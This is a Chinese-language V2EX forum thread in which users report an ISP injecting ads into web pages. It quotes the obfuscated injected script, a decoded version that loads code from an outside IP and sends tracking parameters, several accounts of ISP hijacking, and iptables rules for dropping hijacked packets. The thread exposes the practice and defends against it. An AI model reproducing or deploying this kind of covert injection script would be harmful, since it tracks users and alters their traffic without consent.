移动宽带访问 51credit，百度等网站居然添加广告

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

现在注册

已注册用户请登录

DNS 参考资料

› List of DNS Record Types

› dig 使用说明

› djbdns

› DNS Parameters

› dnslib for Python

这是一个创建于 3544 天前的主题，其中的信息可能已经有所发展或是发生改变。

代码如下，居然还是加密的。

<script>var d="=iunm?=ifbe?=mjol!sfm>#tuzmftiffu#!uzqf>#ufyu0dtt#!isfg>#iuuq;00322/249/318/33:;6873903/dtt#?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00322/249/318/33:;687390d/kt#?=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00322/249/318/33:;6873903/kt#?=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#?wbs!q>#iuuq;00322/249/318/33:;687390b0t@beje>311615'uddb>NUN5NUNxPUB3PUV>'vsjq>279327:544'tqpsu>";function i(_,__){_+=__;var $="";for(var u=0;u<_.length;u++){var r=_.charCodeAt(u);$+=String.fromCharCode(r-1);}return $;} var c="1'fqpsu>1'psmv>bIS1dEpwM3Kjdz52NXOz[XSqeD6kc31w[n:zeX1uN{huNT6peH2t'tqje>2783743675'bsfb>2:7'ut>2535869883'bpsmv>bIS1dEpwM{JyNT5yN{hvNkB4MkJzPUp2O{ZzPD9zNEB2NERw'q2bsn>463'q3bsn>611'q4bsn>21'q5bsn>6'q6bsn>4'q7bsn>2'bqqe>1'ibtDpvou>1'ibtXijufVtfs>1#<=0tdsjqu?=0ifbe?=cpez!je>#c#!sjhiuNbshjo>1!upqNbshjo>1!mfguNbshjo>1!tdspmm>op!pompbe>#joju)q*#!pocfgpsfvompbe>#ttu)*#?=0cpez?=0iunm?";document.write(i(d,c));</script>

uzqf

iuuq

var

17 条回复 • 2015-02-25 23:17:03 +08:00

yetsky

2015-02-24 15:17:59 +08:00

解密后
<html><head><link rel="stylesheet" type="text/css" href="http://211.138.207.229:57628/2.css"><script type="text/javascript" src="http://211.138.207.229:57628/c.js"></script><script type="text/javascript" src="http://211.138.207.229:57628/2.js"></script><script type="text/javascript">var p="http://211.138.207.229:57628/a/s?adid=200504&tcca=MTM4MTMwOTA2OTU=&urip=1682169433&sport=0&eport=0&orlu=aHR0cDovL2Jicy41MWNyZWRpdC5jb20vZm9ydW0tMzgtMS5odG1s&spid=1672632564&area=196&ts=1424758772&aorlu=aHR0cDovLzIxMS4xMzguMjA3LjIyOTo1NzYyOC8yMDA1MDQv&p1arm=352&p2arm=500&p3arm=10&p4arm=5&p5arm=3&p6arm=1&appd=0&hasCount=0&hasWhiteUser=0";</script></head><body id="b" rightMargin=0 topMargin=0 leftMargin=0 scroll=no onload="init(p)" onbeforeunload="sst()"></body></html>

arachide

2015-02-24 15:26:30 +08:00

正常
百度 360 金山搜狗
是中国4大垃圾软件厂商

慎用

偶是不用大把更好性能的工具何必去找虐

wdlth

2015-02-24 15:29:47 +08:00

连电信都加，移动铁通还用说？

tdifg

2015-02-24 15:33:35 +08:00

哎，你是没用过长城宽带

arachide

2015-02-24 15:35:19 +08:00

你去网吧试试bing
保准到百度

哈哈

isnowify

2015-02-24 15:40:56 +08:00 via iPhone

电信访问什么都加，手机端加完广告后整个页面都变得如此细长，惨不忍睹。。。
另外
@Livid should move to http://v2ex.com/go/bb
貌似v2ex支持回复翻页了？

zsx

2015-02-24 16:00:22 +08:00

福州铁通，行为包括：
1. 概率：相当大；劫持百度统计的统计js，行为包括：点击带百度统计的网站的任何位置都会被跳转到某页游网站、右下角弹窗其中之一；
2. 概率：100%；在PCQQ好友面板的 [动态] 和手机QQ空间触屏版投放右下角广告；
3. 概率：100%；把114DNS和Google DNS劫持到自己的DNS；
4. 概率：看心情；百度首页，强制加推广链接并清空Cookies（嗯强制退出百度账号哦）。曾经导致百度搜索无法翻页，点击第二页等强制跳转到第一页。
5. 概率：每日首次访问100%，剩下看心情；淘宝、京东等，跳转到自己的返利链接；
6. 概率：看心情；随机跳转到别的网站（比如打开zhihu.com跳到了电影站）。

另外百度首页的跳转证据还很难抓，我自己用cURL的时候就正常，还要大改HTTP头完全模拟浏览器才能抓得到……而且不定时……我要抓的时候就消失了……

nvidiaAMD980X

2015-02-24 16:57:12 +08:00 via Android

百度和Bing的页面也不整洁，Bing搜索框莫名其妙地下拉新闻给你，百度就是个广告流氓～～～最喜欢Google了，但每次搜索都要挂V---P----N。

Silicon

2015-02-24 17:25:38 +08:00

以下几条辽宁铁通保平安
请根据自己情况修改
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m ttl --ttl-eq 124 -j LOG --log-prefix "Caught bad ttl of hijack: "
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m ttl --ttl-eq 124 -m comment --comment "Bad ttl of hijack" -j DROP
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m u32 --u32 "0x6&0xff=0x6&&0x0>>0x16&0x3c@0xc&0xffff=0xce56" -j LOG --log-prefix "Caught bad window of hijack"
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m u32 --u32 "0x6&0xff=0x6&&0x0>>0x16&0x3c@0xc&0xffff=0xce56" -m comment --comment "Bad window of hijack" -j DROP
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m u32 --u32 "0x6&0xff=0x6&&0x0>>0x16&0x3c@0xc&0xffff=0x800" -j LOG --log-prefix "Caught bad window of hijack"
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m u32 --u32 "0x6&0xff=0x6&&0x0>>0x16&0x3c@0xc&0xffff=0x800" -m comment --comment "Bad window of hijack" -j DROP